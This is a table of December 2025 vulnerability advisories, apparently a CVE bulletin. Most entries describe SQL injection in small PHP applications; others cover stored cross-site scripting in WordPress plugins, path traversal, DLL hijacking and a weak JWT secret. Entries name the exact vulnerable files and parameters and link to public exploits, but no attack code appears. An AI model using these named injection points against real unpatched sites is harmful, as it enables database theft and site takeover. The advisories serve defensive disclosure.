| widgetpack--Reviews Widget for Google, Yelp & Recommendations | The Social Reviews & Recommendations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via several parameters in the 'trim_text' function in all versions up to, and including, 2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability was partially patched in version 2.5. | 2025-12-09 | 7.2 | CVE-2025-12705 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6d2aa302-aaab-4bf1-9a79-144290b967de?source=cve https://plugins.trac.wordpress.org/browser/fb-reviews-widget/trunk/includes/class-view.php#L447 https://plugins.trac.wordpress.org/browser/fb-reviews-widget/trunk/includes/class-view.php#L449 https://plugins.trac.wordpress.org/browser/fb-reviews-widget/trunk/includes/class-view.php#L452 https://plugins.trac.wordpress.org/changeset/3393291/ https://plugins.trac.wordpress.org/changeset/3406362/ |
| Aksis Computer Services and Consulting Inc.--AxOnboard | Authorization Bypass Through User-Controlled Key vulnerability in Aksis Computer Services and Consulting Inc. AxOnboard allows Exploitation of Trusted Identifiers. This issue affects AxOnboard: from 3.2.0 before 3.3.0. | 2025-12-11 | 7.6 | CVE-2025-13003 | https://www.usom.gov.tr/bildirim/tr-25-0446 |
| payamito--payamito sms woocommerce | The افزونه پیامک ووکامرس فوق حرفه ای (جدید) ("Ultra-Professional WooCommerce SMS Plugin (New)") payamito sms woocommerce plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'columns' parameter in all versions up to, and including, 1.3.5. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-13 | 7.5 | CVE-2025-13077 | https://www.wordfence.com/threat-intel/vulnerabilities/id/75de6387-fac7-403d-9e6c-89570658d978?source=cve https://plugins.trac.wordpress.org/browser/payamito-sms-woocommerce/tags/1.3.5/includes/core/payamito-core/admin/class-payamito-admin.php#L64 https://plugins.trac.wordpress.org/browser/payamito-sms-woocommerce/tags/1.3.5/includes/core/payamito-core/includes/class-db.php#L64 https://owasp.org/www-community/attacks/SQL_Injection |
| listingthemes--WP Directory Kit | The WP Directory Kit plugin for WordPress is vulnerable to SQL Injection via the 'hide_fields' and 'attr_search' parameters in all versions up to, and including, 1.4.7 due to insufficient escaping on the user supplied parameters and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-13 | 7.5 | CVE-2025-13089 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b0696cbe-70e0-402d-bcfd-40907a973785?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3396348%40wpdirectorykit&new=3396348%40wpdirectorykit&sfp_email=&sfph_mail= https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3412635%40wpdirectorykit&new=3412635%40wpdirectorykit&sfp_email=&sfph_mail= |
| Netiket Information Technologies Ltd. Co.--ApplyLogic | Authorization Bypass Through User-Controlled Key vulnerability in Netiket Information Technologies Ltd. Co. ApplyLogic allows Exploitation of Trusted Identifiers. This issue affects ApplyLogic: through 01.12.2025. | 2025-12-11 | 7.6 | CVE-2025-13124 | https://www.usom.gov.tr/bildirim/tr-25-0447 |
| tomdever--wpForo Forum | The wpForo Forum plugin for WordPress is vulnerable to generic SQL Injection via the `post_args` and `topic_args` parameters in all versions up to, and including, 2.4.12 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-14 | 7.5 | CVE-2025-13126 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fd1704ef-e259-40a3-974b-128145bc8a4a?source=cve https://plugins.trac.wordpress.org/browser/wpforo/tags/2.4.10/classes/Topics.php?rev=3386327#L1641 https://plugins.trac.wordpress.org/browser/wpforo/tags/2.4.10/classes/Posts.php?rev=3386327#L633 https://plugins.trac.wordpress.org/browser/wpforo/tags/2.4.10/widgets/RecentTopics.php?rev=3386327#L117 https://plugins.trac.wordpress.org/browser/wpforo/tags/2.4.10/widgets/RecentPosts.php?rev=3386327#L177 |
| Lenovo--One Client | A potential DLL hijacking vulnerability was reported in Lenovo One Client during an internal security assessment that could allow a local authenticated user to execute code with elevated privileges. | 2025-12-10 | 7.8 | CVE-2025-13152 | https://iknow.lenovo.com.cn/detail/435007 https://one.lenovo.com/ |
| Lenovo--Baiying Client | An improper permissions vulnerability was reported in Lenovo Baiying Client that could allow a local authenticated user to execute code with elevated privileges. | 2025-12-10 | 7.8 | CVE-2025-13155 | https://iknow.lenovo.com.cn/detail/435005 |
| IBM--Aspera Orchestrator | IBM Aspera Orchestrator 4.0.0 through 4.1.0 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify, or delete information in the back-end database. | 2025-12-11 | 7.6 | CVE-2025-13214 | https://www.ibm.com/support/pages/node/7254434 |
| hippooo--Hippoo Mobile App for WooCommerce | The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.7.1 via the template_redirect() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. | 2025-12-10 | 7.5 | CVE-2025-13339 | https://www.wordfence.com/threat-intel/vulnerabilities/id/06900b4b-6607-4b25-b4bc-2e2906160421?source=cve https://plugins.trac.wordpress.org/changeset/3412701/ |
| cleantalk--Login Security, FireWall, Malware removal by CleanTalk | The Login Security, FireWall, Malware removal by CleanTalk plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the page URL in all versions up to, and including, 2.168 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-09 | 7.2 | CVE-2025-13604 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1e35eb83-716e-4177-99ba-24a884725265?source=cve https://plugins.trac.wordpress.org/browser/security-malware-firewall/tags/2.168/inc/spbc-settings.php#L2342 |
| Ivanti--Endpoint Manager | Path traversal in Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote authenticated attacker to write arbitrary files outside of the intended directory. User interaction is required. | 2025-12-09 | 7.1 | CVE-2025-13661 | https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024 |
| Ivanti--Endpoint Manager | Improper verification of cryptographic signatures in the patch management component of Ivanti Endpoint Manager prior to version 2024 SU4 SR1 allows a remote unauthenticated attacker to execute arbitrary code. User Interaction is required. | 2025-12-09 | 7.8 | CVE-2025-13662 | https://forums.ivanti.com/s/article/Security-Advisory-EPM-December-2025-for-EPM-2024 |
| cvedovini--LT Unleashed | The LT Unleashed plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.1 via the 'template' parameter in the `book` shortcode due to insufficient path sanitization. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where files such as wp-config.php can be included. | 2025-12-12 | 7.5 | CVE-2025-13886 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c72099cc-e70a-4afe-92c0-8f9f8c1e91b7?source=cve https://plugins.trac.wordpress.org/browser/lt-unleashed/trunk/lt-unleashed.php#L315 https://plugins.trac.wordpress.org/browser/lt-unleashed/tags/1.1.1/lt-unleashed.php#L315 https://plugins.trac.wordpress.org/browser/lt-unleashed/trunk/lt-unleashed.php#L241 |
| qdonow--WPNakama Team and multi-Client Collaboration, Editorial and Project Management | The WPNakama plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 0.6.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-12 | 7.5 | CVE-2025-14068 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9abfd0f5-f665-4745-9756-8445ddbdc29d?source=cve https://plugins.trac.wordpress.org/browser/wpnakama/trunk/inc/class-wpnakama.php#L197 https://plugins.trac.wordpress.org/browser/wpnakama/tags/0.6.3/inc/class-wpnakama.php#L197 https://plugins.trac.wordpress.org/browser/wpnakama/trunk/inc/class-wpnakama-api.php#L206 https://plugins.trac.wordpress.org/browser/wpnakama/tags/0.6.3/inc/class-wpnakama-api.php#L206 https://cwe.mitre.org/data/definitions/89.html https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3412904%40wpnakama&new=3412904%40wpnakama&sfp_email=&sfph_mail= |
| amans2k--FunnelKit Funnel Builder for WooCommerce Checkout | The FunnelKit - Funnel Builder for WooCommerce Checkout plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'opid' parameter in all versions up to, and including, 3.13.1.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2025-12-12 | 7.5 | CVE-2025-14169 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fb19f920-0fd0-491e-9e87-62c828cad9b9?source=cve https://plugins.trac.wordpress.org/browser/funnel-builder/tags/3.13.1.5/modules/optins/admin/db/class-wffn-db-optin.php#L79 https://plugins.trac.wordpress.org/browser/funnel-builder/tags/3.13.1.5/modules/optins/merge-tags/class-bwf-optin-tags.php#L126 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3415550%40funnel-builder%2Ftrunk&old=3414128%40funnel-builder%2Ftrunk&sfp_email=&sfph_mail= |
| tushar-2223--Hotel-Management-System | A vulnerability was identified in tushar-2223 Hotel-Management-System up to bb1f3b3666124b888f1e4bcf51b6fba9fbb01d15. The impacted element is an unknown function of the file /admin/invoiceprint.php. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit is publicly available and might be used. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. | 2025-12-08 | 7.3 | CVE-2025-14207 | VDB-334650 \| tushar-2223 Hotel-Management-System invoiceprint.php sql injection VDB-334650 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #700478 \| tushar-2223 Hotel-Management-System latest SQL Injection https://github.com/yaklang/IRifyScanResult/blob/main/Hotel-Management-System/SQL_Injection_Vulnerability_Report.md |
| Campcodes--School File Management System | A weakness has been identified in Campcodes School File Management System 1.0. This impacts an unknown function of the file /update_query.php. This manipulation of the argument stud_id causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be exploited. | 2025-12-08 | 7.3 | CVE-2025-14209 | VDB-334652 \| Campcodes School File Management System update_query.php sql injection VDB-334652 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #700896 \| Campcodes School File Management System 1.0 SQL Injection https://github.com/IdealDreamLast/PublicCVE/issues/1 https://www.campcodes.com/ |
| projectworlds--Advanced Library Management System | A security vulnerability has been detected in projectworlds Advanced Library Management System 1.0. Affected is an unknown function of the file /delete_member.php. Such manipulation of the argument user_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed publicly and may be used. | 2025-12-08 | 7.3 | CVE-2025-14210 | VDB-334653 \| projectworlds Advanced Library Management System delete_member.php sql injection VDB-334653 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #700948 \| projectworlds Advanced Library Management System 1.0 delete_member.php SQL injection https://github.com/rassec2/dbcve/issues/9 |
| projectworlds--Advanced Library Management System | A vulnerability was detected in projectworlds Advanced Library Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /delete_book.php. Performing manipulation of the argument book_id results in sql injection. The attack may be initiated remotely. The exploit is now public and may be used. | 2025-12-08 | 7.3 | CVE-2025-14211 | VDB-334654 \| projectworlds Advanced Library Management System delete_book.php sql injection VDB-334654 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #700949 \| projectworlds Advanced Library Management System 1.0 delete_book.php SQL injection https://github.com/rassec2/dbcve/issues/10 |
| projectworlds--Advanced Library Management System | A flaw has been found in projectworlds Advanced Library Management System 1.0. Affected by this issue is some unknown functionality of the file /member_search.php. Executing manipulation of the argument roll_number can lead to sql injection. The attack may be launched remotely. The exploit has been published and may be used. | 2025-12-08 | 7.3 | CVE-2025-14212 | VDB-334655 \| projectworlds Advanced Library Management System member_search.php sql injection VDB-334655 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #700977 \| projectworlds Advanced Library Management System 1.0 member_search.php SQL injection https://github.com/rassec2/dbcve/issues/11 |
| code-projects--Currency Exchange System | A vulnerability was found in code-projects Currency Exchange System 1.0. This vulnerability affects unknown code of the file /edit.php. The manipulation of the argument ID results in sql injection. The attack can be executed remotely. The exploit has been made public and could be used. | 2025-12-08 | 7.3 | CVE-2025-14215 | VDB-334657 \| code-projects Currency Exchange System edit.php sql injection VDB-334657 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #701151 \| Code-Projects Currency Exchange System 1.0 /edit.php SQL Injection https://github.com/rassec2/dbcve/issues/12 https://code-projects.org/ |
| code-projects--Currency Exchange System | A vulnerability was determined in code-projects Currency Exchange System 1.0. This issue affects some unknown processing of the file /viewserial.php. This manipulation of the argument ID causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-08 | 7.3 | CVE-2025-14216 | VDB-334658 \| code-projects Currency Exchange System viewserial.php sql injection VDB-334658 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #701152 \| Code-Projects Currency Exchange System 1.0 /viewserial.php SQL Injection https://github.com/rassec2/dbcve/issues/13 https://code-projects.org/ |
| code-projects--Currency Exchange System | A vulnerability was identified in code-projects Currency Exchange System 1.0. Impacted is an unknown function of the file /edittrns.php. Such manipulation of the argument ID leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used. | 2025-12-08 | 7.3 | CVE-2025-14217 | VDB-334659 \| code-projects Currency Exchange System edittrns.php sql injection VDB-334659 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #701154 \| Code-Projects Currency Exchange System 1.0 /edittrns.php SQL Injection https://github.com/rassec2/dbcve/issues/14 https://code-projects.org/ |
| code-projects--Currency Exchange System | A security flaw has been discovered in code-projects Currency Exchange System 1.0. The affected element is an unknown function of the file /editotheraccount.php. Performing manipulation of the argument ID results in sql injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be exploited. | 2025-12-08 | 7.3 | CVE-2025-14218 | VDB-334660 \| code-projects Currency Exchange System editotheraccount.php sql injection VDB-334660 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #701155 \| Code-Projects Currency Exchange System 1.0 /editotheraccount.php SQL Injection https://github.com/rassec2/dbcve/issues/15 https://code-projects.org/ |
| code-projects--Simple Leave Manager | A vulnerability has been found in code-projects Simple Leave Manager 1.0. Affected by this vulnerability is an unknown functionality of the file /request.php. Such manipulation of the argument staff_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-08 | 7.3 | CVE-2025-14223 | VDB-334665 \| code-projects Simple Leave Manager request.php sql injection VDB-334665 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #701639 \| code-projects Simple Leave Manager In PHP With Source Code 1.0 SQL Injection https://github.com/woshilaiyi/cve/issues/4 https://code-projects.org/ |
| itsourcecode--Student Management System | A vulnerability was identified in itsourcecode Student Management System 1.0. This vulnerability affects unknown code of the file /edit_user.php. The manipulation of the argument fname leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. Other parameters might be affected as well. | 2025-12-08 | 7.3 | CVE-2025-14226 | VDB-334668 \| itsourcecode Student Management System edit_user.php sql injection VDB-334668 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #701801 \| itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/17 https://itsourcecode.com/ |
| n/a--IdeaCMS | A vulnerability has been found in IdeaCMS up to 1.8. This affects the function whereRaw of the file app/common/logic/index/Coupon.php. Such manipulation of the argument params leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-08 | 7.3 | CVE-2025-14245 | VDB-334755 \| IdeaCMS Coupon.php whereRaw sql injection VDB-334755 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702437 \| Shop (GoodPu Mall) IdeaCMS 1.0 goods_ids parame SQL Injection https://github.com/rassec2/dbcve/issues/17 |
| code-projects--Simple Shopping Cart | A vulnerability was identified in code-projects Simple Shopping Cart 1.0. Impacted is an unknown function of the file /adminlogin.php. The manipulation of the argument admin_username leads to sql injection. The attack is possible to be carried out remotely. The exploit is publicly available and might be used. | 2025-12-08 | 7.3 | CVE-2025-14248 | VDB-334758 \| code-projects Simple Shopping Cart adminlogin.php sql injection VDB-334758 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702464 \| code-projects Simple Shopping Cart V1.0 SQL injection https://github.com/zzb1388/cve/issues/92 https://code-projects.org/ |
| code-projects--Online Ordering System | A security flaw has been discovered in code-projects Online Ordering System 1.0. The affected element is an unknown function of the file /user_school.php. The manipulation of the argument product_id results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be exploited. | 2025-12-08 | 7.3 | CVE-2025-14249 | VDB-334759 \| code-projects Online Ordering System user_school.php sql injection VDB-334759 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702465 \| code-projects Online Ordering System V1.0 SQL injection https://github.com/zzb1388/cve/issues/93 https://code-projects.org/ |
| code-projects--Online Ordering System | A weakness has been identified in code-projects Online Ordering System 1.0. The impacted element is an unknown function of the file /user_contact.php. This manipulation of the argument Name causes sql injection. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be exploited. | 2025-12-08 | 7.3 | CVE-2025-14250 | VDB-334760 \| code-projects Online Ordering System user_contact.php sql injection VDB-334760 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702466 \| code-projects Online Ordering System V1.0 SQL injection https://github.com/zzb1388/cve/issues/94 https://code-projects.org/ |
| code-projects--Online Ordering System | A security vulnerability has been detected in code-projects Online Ordering System 1.0. This affects an unknown function of the file /admin/ of the component Admin Login. Such manipulation of the argument Username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. | 2025-12-08 | 7.3 | CVE-2025-14251 | VDB-334761 \| code-projects Online Ordering System Admin Login admin sql injection VDB-334761 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702467 \| code-projects Online Ordering System V1.0 SQL injection https://github.com/zzb1388/cve/issues/95 https://code-projects.org/ |
| itsourcecode--Student Management System | A vulnerability was detected in itsourcecode Student Management System 1.0. This impacts an unknown function of the file /newcurriculm.php. Performing manipulation of the argument ID results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. | 2025-12-08 | 7.3 | CVE-2025-14256 | VDB-334762 \| itsourcecode Student Management System newcurriculm.php sql injection VDB-334762 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702484 \| itsourcecode Student Management System V1.0 SQL Injection https://github.com/J0kkeR/cve/issues/1 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A flaw has been found in itsourcecode Student Management System 1.0. Affected is an unknown function of the file /newrecord.php. Executing manipulation of the argument ID can lead to sql injection. The attack can be launched remotely. The exploit has been published and may be used. | 2025-12-08 | 7.3 | CVE-2025-14257 | VDB-334763 \| itsourcecode Student Management System newrecord.php sql injection VDB-334763 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702487 \| itsourcecode Student Management System V1.0 SQL Injection https://github.com/J0kkeR/cve/issues/2 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability has been found in itsourcecode Student Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /newsubject.php. The manipulation of the argument sub leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | 2025-12-08 | 7.3 | CVE-2025-14258 | VDB-334764 \| itsourcecode Student Management System newsubject.php sql injection VDB-334764 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702619 \| itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/18 https://itsourcecode.com/ |
| Litmuschaos--litmus | The Litmus platform uses JWT for authentication and authorization, but the secret being used for signing the JWT is only 6 bytes long at its core, which makes it extremely easy to crack. | 2025-12-08 | 7.1 | CVE-2025-14261 | https://research.jfrog.com/vulnerabilities/litmus-jwt-missing-entropy-elevation-jfsa-2025-001648159/ https://github.com/litmuschaos/litmus/pull/5324 |
| code-projects--Employee Profile Management System | A vulnerability was found in code-projects Employee Profile Management System 1.0. Affected is an unknown function of the file edit_personnel.php. The manipulation of the argument per_id results in sql injection. The attack can be launched remotely. The exploit has been made public and could be used. | 2025-12-09 | 7.3 | CVE-2025-14285 | VDB-334873 \| code-projects Employee Profile Management System edit_personnel.php sql injection VDB-334873 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702684 \| code-projects Employee Profile Management System V1 SQL injection https://github.com/tiancesec/CVE/issues/15 https://code-projects.org/ |
| ravynsoft--ravynos | NULL Pointer Dereference vulnerability in ravynsoft ravynos. This issue affects ravynos: through 0.5.2. | 2025-12-09 | 7.5 | CVE-2025-14309 | https://github.com/ravynsoft/ravynos/pull/502 |
| itsourcecode--Student Management System | A flaw has been found in itsourcecode Student Management System 1.0. Affected is an unknown function of the file /new_adviser.php. Executing manipulation of the argument Name can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used. | 2025-12-09 | 7.3 | CVE-2025-14334 | VDB-335159 \| itsourcecode Student Management System new_adviser.php sql injection VDB-335159 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702741 \| itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/19 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability has been found in itsourcecode Student Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /new_school_year.php. The manipulation of the argument sy leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2025-12-09 | 7.3 | CVE-2025-14335 | VDB-335160 \| itsourcecode Student Management System new_school_year.php sql injection VDB-335160 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702743 \| itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/20 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability was found in itsourcecode Student Management System 1.0. Affected by this issue is some unknown functionality of the file /promote.php. The manipulation of the argument sy results in sql injection. It is possible to launch the attack remotely. The exploit has been made public and could be used. | 2025-12-09 | 7.3 | CVE-2025-14336 | VDB-335161 \| itsourcecode Student Management System promote.php sql injection VDB-335161 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702744 \| itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/21 https://itsourcecode.com/ |
| itsourcecode--Student Management System | A vulnerability was determined in itsourcecode Student Management System 1.0. This affects an unknown part of the file /new_grade.php. This manipulation of the argument grade causes sql injection. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-09 | 7.3 | CVE-2025-14337 | VDB-335162 \| itsourcecode Student Management System new_grade.php sql injection VDB-335162 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702745 \| itsourcecode Student Management System V1.0 SQL Injection https://github.com/ltranquility/CVE/issues/22 https://itsourcecode.com/ |
| Campcodes--Supplier Management System | A flaw has been found in Campcodes Supplier Management System 1.0. Affected is an unknown function of the file /admin/add_distributor.php. This manipulation of the argument txtDistributorAddress causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. | 2025-12-11 | 7.3 | CVE-2025-14514 | VDB-335852 \| Campcodes Supplier Management System add_distributor.php sql injection VDB-335852 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #702752 \| Campcodes Supplier Management System V1.0 SQL Injection Submit #702760 \| Campcodes Supplier Management System V1.0 SQL Injection (Duplicate) https://github.com/ProgramShowMaker/CVE/issues/4 https://github.com/ProgramShowMaker/CVE/issues/5 https://www.campcodes.com/ |
| Campcodes--Supplier Management System | A vulnerability has been found in Campcodes Supplier Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/add_unit.php. Such manipulation of the argument txtunitDetails leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-12-11 | 7.3 | CVE-2025-14515 | VDB-335853 \| Campcodes Supplier Management System add_unit.php sql injection VDB-335853 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #704108 \| Campcodes Supplier Management System V1.0 SQL Injection https://github.com/falling-snow1/vuldb/issues/3 https://www.campcodes.com/ |
| projectworlds--Advanced Library Management System | A weakness has been identified in projectworlds Advanced Library Management System 1.0. This vulnerability affects unknown code of the file /view_book.php. Executing manipulation of the argument book_id can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. | 2025-12-11 | 7.3 | CVE-2025-14527 | VDB-335867 \| projectworlds Advanced Library Management System view_book.php sql injection VDB-335867 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #703096 \| Projectworlds Library Management System V1.0 SQL Injection https://github.com/Sunhaobin318/CVE/issues/8 |
| Campcodes--Retro Basketball Shoes Online Store | A flaw has been found in Campcodes Retro Basketball Shoes Online Store 1.0. The affected element is an unknown function of the file /admin/admin_running.php. This manipulation of the argument pid causes sql injection. It is possible to initiate the attack remotely. The exploit has been published and may be used. | 2025-12-11 | 7.3 | CVE-2025-14529 | VDB-335870 \| Campcodes Retro Basketball Shoes Online Store admin_running.php sql injection VDB-335870 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #703191 \| Campcodes Retro Basketball Shoes Online Store V1.0 SQL Injection https://github.com/Rowantu/CVE/issues/7 https://www.campcodes.com/ |
| code-projects--Class and Exam Timetable Management | A security flaw has been discovered in code-projects Class and Exam Timetable Management 1.0. Affected by this vulnerability is an unknown functionality of the file /index.php of the component Login. The manipulation of the argument username/password results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be exploited. | 2025-12-11 | 7.3 | CVE-2025-14536 | VDB-335875 \| code-projects Class and Exam Timetable Management Login index.php sql injection VDB-335875 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #703700 \| code projects Class and Exam Timetable Management System 1.0 SQL injection Submit #703701 \| code projects Class and Exam Timetable Management System 1.0 SQL injection (Duplicate) https://github.com/woshilaiyi/cve/issues/11 https://github.com/woshilaiyi/cve/issues/12 https://code-projects.org/ |
| code-projects--Class and Exam Timetable Management | A weakness has been identified in code-projects Class and Exam Timetable Management 1.0. Affected by this issue is some unknown functionality of the file /preview7.php. This manipulation of the argument course_year_section/semester causes sql injection. Remote exploitation of the attack is possible. The exploit has been made available to the public and could be exploited. | 2025-12-11 | 7.3 | CVE-2025-14537 | VDB-335876 \| code-projects Class and Exam Timetable Management preview7.php sql injection VDB-335876 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #703712 \| code projects Class and Exam Timetable Management System 1.0 SQL injection Submit #703717 \| code projects Class and Exam Timetable Management System 1.0 SQL injection (Duplicate) https://github.com/woshilaiyi/cve/issues/13 https://github.com/woshilaiyi/cve/issues/14 https://code-projects.org/ |
| n/a--python-utcp | The vulnerability arises when a client fetches a tool's JSON specification, known as a Manual, from a remote Manual Endpoint. While a provider may initially serve a benign manual (e.g., one defining an HTTP tool call), earning the client's trust, a malicious provider can later change the manual to exploit the client. | 2025-12-13 | 7.5 | CVE-2025-14542 | https://research.jfrog.com/vulnerabilities/python-utcp-untrusted-manual-command-execution-jfsa-2025-001648329/ https://github.com/universal-tool-calling-protocol/python-utcp/commit/2dc9c02df72cad3770c934959325ec344b441444 |
| kidaze--CourseSelectionSystem | A vulnerability was identified in kidaze CourseSelectionSystem up to 42cd892b40a18d50bd4ed1905fa89f939173a464. The affected element is an unknown function of the file /Profilers/SProfile/login1.php. Such manipulation of the argument Username leads to sql injection. The attack may be performed from remote. The exploit is publicly available and might be used. | 2025-12-12 | 7.3 | CVE-2025-14565 | VDB-336189 \| kidaze CourseSelectionSystem login1.php sql injection VDB-336189 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #703875 \| github.com Course Selection System v1.0 SQL injection https://github.com/Anti1i/cve/issues/1 |
| kidaze--CourseSelectionSystem | A security flaw has been discovered in kidaze CourseSelectionSystem up to 42cd892b40a18d50bd4ed1905fa89f939173a464. The impacted element is an unknown function of the file /Profilers/SProfile/reg.php. Performing manipulation of the argument USN results in sql injection. It is possible to initiate the attack remotely. The exploit has been released to the public and may be exploited. | 2025-12-12 | 7.3 | CVE-2025-14566 | VDB-336190 \| kidaze CourseSelectionSystem reg.php sql injection VDB-336190 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #703876 \| github.com Course Selection System v1.0 SQL injection Submit #704951 \| github.com Course Selection System Project V1.0 SQL Injection (Duplicate) https://github.com/Anti1i/cve/issues/2 |
| projectworlds--Advanced Library Management System | A flaw has been found in projectworlds Advanced Library Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /view_admin.php. This manipulation of the argument admin_id causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. | 2025-12-12 | 7.3 | CVE-2025-14570 | VDB-336194 \| projectworlds Advanced Library Management System view_admin.php sql injection VDB-336194 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #704087 \| projectworlds Library Management System V1.0 SQL Injection https://github.com/louxiadelaolitou/CVE/issues/1 |
